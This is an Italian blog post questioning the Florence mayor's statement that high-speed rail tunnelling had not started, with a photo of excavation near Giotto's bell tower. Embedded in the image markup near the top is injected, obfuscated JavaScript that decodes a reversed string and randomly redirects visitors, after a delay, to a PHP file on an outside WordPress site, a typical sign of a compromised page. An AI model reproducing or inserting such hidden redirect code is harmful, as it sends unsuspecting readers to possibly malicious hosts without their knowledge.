Cartoline da Firenze: talpa o non talpa, si scava da mesi

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2011/02/campanile_giotto_tav.jpg”>
panorama da Via Circondaria

Matteo Renzi, sindaco di Firenze, avrebbe affermato a proposito della TAV: “La talpa non è ancora arrivata, quindi non si sta scavando”.
Per chi non le avesse viste coi proprio occhi, pubblichiamo una delle foto che ci invia Idra: montagne di terra in via Circondaria, dove si sta scavando per la stazione Foster, e sullo sfondo il campanile di Giotto.

Ma il sindaco ha aggiunto anche “Credo che la Tav non butterà giù palazzi e penso che i comitati non debbano fare terrorismo psicologico”.
Per annullare gli effetti del presunto terrorismo psicologico, se davvero le preoccupazioni dei comitati sono infondate, sarebbe sufficiente informare i cittadini per tempo, con quella trasparenza e chiarezza tante volte promessa… possibilmente senza negare l’evidenza dei lavori in corso.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *